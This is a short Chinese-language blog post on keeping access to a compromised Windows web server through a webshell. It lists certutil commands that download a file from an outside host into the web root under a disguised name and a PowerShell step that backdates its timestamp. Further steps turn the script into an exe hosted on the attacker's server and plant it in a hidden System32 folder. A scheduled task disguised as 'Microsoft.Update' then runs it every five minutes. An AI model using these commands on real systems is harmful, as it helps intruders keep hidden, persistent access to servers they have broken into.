Webshell权限维持

权限维持
certutil.exe -urlcache -split -f https://baidu.com/own.php C:\wwwroot\.Javascript.php #下载文件到指定位置,不一定是webshell
echo Set-ItemProperty -Path C:\wwwroot\.Javascript.php -Name LastWriteTime -Value "2014-08-29 05:21:44" >import.ps1 #创建ps1脚本文件修改文件创建时间
powershell -f ./import.ps1

将以上内容写进bat文件，用Bat To Exe Conterver转成exe文件，然后上传到你的oss地址或者vps

计划任务
certutil.exe -urlcache -split -f https://oss地址/Microsoft.UpdateServices.UI.exe C:\Windows\Temp\Microsoft.UpdateServices.UI.exe
mkdir C:\Windows\System32\system...\ #创建隐藏文件夹
copy C:\Windows\Temp\Microsoft.UpdateServices.UI.exe C:\Windows\System32\system...\Microsoft.UpdateServices.UI.exe 复制到隐藏文件夹
schtasks /create /sc minute /mo 5 /tn "Microsoft.Update" /tr C:\Windows\System32\system...\Microsoft.UpdateServices.UI.exe 创建计划任务，5分钟执行一次

posted @ 2022-04-04 17:54 attacks 阅读(124) 评论(0) 收藏举报

刷新页面返回顶部

Attack's Blog

运筹帷幄之中，决胜千里之外

Webshell权限维持

公告